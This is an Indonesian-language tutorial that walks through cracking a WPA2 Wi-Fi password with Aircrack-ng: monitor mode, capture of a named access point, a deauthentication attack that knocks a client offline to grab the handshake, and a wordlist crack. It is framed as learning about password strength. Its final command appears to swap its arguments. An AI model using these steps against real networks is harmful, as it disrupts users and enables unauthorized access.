Perkembangan Ilmu Pengetahuan dan perkembangan Teknologi dalam dunia keamanan dimassa sekarang berkembang sangatlah pesat. Hal ini sudah pasti dapat berpengaruh baik secara langsung maupun tidak langsung pada berbagai aspek.Diantaranya aspek keamanan komputer.
Sebagaimana kita ketahui aspek keamanan komputer yaitu ada 3 yaitu Confidential,Integrity,dan avalaibility.
Untuk itu kami menulis ini agar kami mengetahui bagaimana proses hacking suatu password dengan menggunakan metode brute force attack dengan begitu kami bisa tahu harus seperti apa password itu kami buat.
Selain itu latar belakang penulisan ini adalah agar dapat mengetahui bagaimana metode dari bruteforce attack serta tools yang di gunakan untuk melakukan serangan tersebut.
Penulisan ini juga supaya kita mengetahui tentang beberapa tools untuk melakukan Penetration test dan gambarang umum dari produk aircrack.
Aircrack-ngadalah kumpulan aplikasi jaringan yang terdiri dari detector, packet sniffer, pemecah dan penganalisis WEP maupun WPA/WPA2 untuk jaringan WLAN 802.11. Aircrack bekerja pada wireless network interface yang mendukung monitoring mode dan bisa mendeteksi trafik dari 802.11a, 802.11b and 802.11g.Aircrack-ng berjalan pada platform sistem operasi Linux,FreeBSD,OS X,Open BSD.
Fitur Fitur Aircrack
Berikut ini adalah fitur yang tersedia pada paket AirCrack:
| Name | Description |
| *aircrack-ng | Cracks WEP and WPA (Dictionary attack) keys. |
| *airmon-ng | Placing different cards in monitor mode. |
| *aireplay-ng | Packet injector (Linux with CommView drivers). |
| *airodump-ng | Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks. |
| airtun-ng | Virtual tunnel interface creator. |
| packetforge-ng | Create encrypted packets for injection. |
| Ivstools | Tools to merge and convert. |
| airbase-ng | Incorporates techniques for attacking client, as opposed to Access Points |
| airdecloak-ng | removes WEP cloaking from pcap files |
| airdriver-ng | Tools for managing wireless drivers |
| airolib-ng | stores and manages ESSID and password lists and compute Pairwise Master Keys |
| airserv-ng | allows you to access the wireless card from other computers. |
| buddy-ng | the helper server for easside-ng, run on a remote computer |
| easside-ng | a tool for communicating to an access point, without the WEP key |
Dari beberapa fitur tersebut yang kami gunakan dalam pembahasan ini di tandai dengan tanda bintang(*)
Rincian Detail Tools Aircrack-ng
Dalam Pembahasan ini penulis menggunakan tools Aircrack-ng dengan metode Brute Force Attack yaitu suatu metode atau teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci yang mungkin. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan yang berarti semakin besar spesifikasi sebuah komputer maka akan semakin cepat juga proses mendapatkan Key/Password yang kita inginkan
Jadi,seperti kita ingin mengetahui suatu password yaitu dengan cara mencoba kumpulan-kumpulan password(wordlist/dictionary) yang kita punya.
Di dalam tools aircrack-ng terdapat beberapa fungsi tetapi dalam pembahasan ini hanya membahas 4 tools saja.
Yaitu airmon-ng,airodump-ng,aireplay-ng,dan aircrack-ng
Fungsi airmon-ng = untuk melihat monitor wifi yang aktif dan mengganti settingan monitor wifi
Fungsi airodump-ng = untuk melakukan sniffing jaringan nirkabel/wifi dan melakukan capture jaringan wifi yang kita lakukan sniffing
Fungsi aireplay-ng = melakukan injector terhadap klien yang terkoneksi ke hotspot agar mendapatkan handshake
Fungsi aircrak-ng = melakukan cracking terhadap jaringan wifi dengan menggunakan wordlist dan file hasil capture dengan menggunakan metode Brute Force Attack
Aircrak-ng berjalan di platform linux, dalam pembahasan ini untuk versi linux yang di gunakan yaitu kali linux 1.0.4
Kali Linux merupakan pembangunan kembali BackTrack Linux secara sempurna, mengikuti sepenuhnya kepada standar pengembangan Debian. Semua infrastruktur baru telah dimasukkan ke dalam satu tempat.
Langkah-Langkah dalam melakukan Brute Force Attack dengan menggunakan Aircrack-ng di kali linux:
Alat dan Bahan:
1.Aircrack-ng
2.Hotspot Target
3.Wordlist/dictionary
Langkah nya:
Buka terminal, ketik
airmon-ng start wlan1
Ketik lagi
airodump-ng mon0
Fungsi untuk melakukan scanning terhadap hotspot di sekitar nya Jika sudah mendapat target tekan CTRL+C untuk selesai
. ketik lagi
airodump-ng -w wificrack -c 1 --bssid 90:F6:52:83:81:1E mon0 --ignore-negative-one
-w = output file berupa wificrack
-c = channel lihat pada CH
--bssid = mac address AP
Lihat pada "STATION" adalah MAC Device yang terhubung dengan WIFI
(PILIH salah 1 Mac address dari station jika lebih dari 1)
Kita akan melakukan Deauth terhadap MAc address D0:17:6A:07:A0:49
sehingga target dapat Disconect dan conect lagi agar Autentikasi nya dapat ter capture (WPA2 Hanshake) di wificrack ( output WPA2 Hanshake )
aireplay-ng --deauth 5 -a 90:F6:52:83:81:1E -c D0:17:6A:07:A0:49 mon0 --ignore-negative-one
--deauth 5 = kita send deauth sebanyak 5x ( bisa dirubah sesuai keiginan untuk melakukan deauth attack, makin banyak,makin client nya tidak bisa koneksi)
-a = bssid AP
-c = client mac address pada station
Jika target mac kita disconect , kemudian conect lagi kita akan mendapat WPA2 Hanshake seperti ini :
Jika kita sudah mendapatkan WPA Hanshake nya, kita crack dengan menggunakan Dictionary attck.
Kemudian ketik
aircrack-ng -w filewordlist.txt hasil_hanshake
aircrack-ng -w wificrack-01.cap 500-worst-passwords.txt
" Semoga Bermanfaat " ! sebagai pengetahuan tidak di gunakan untuk hal tidak baik.
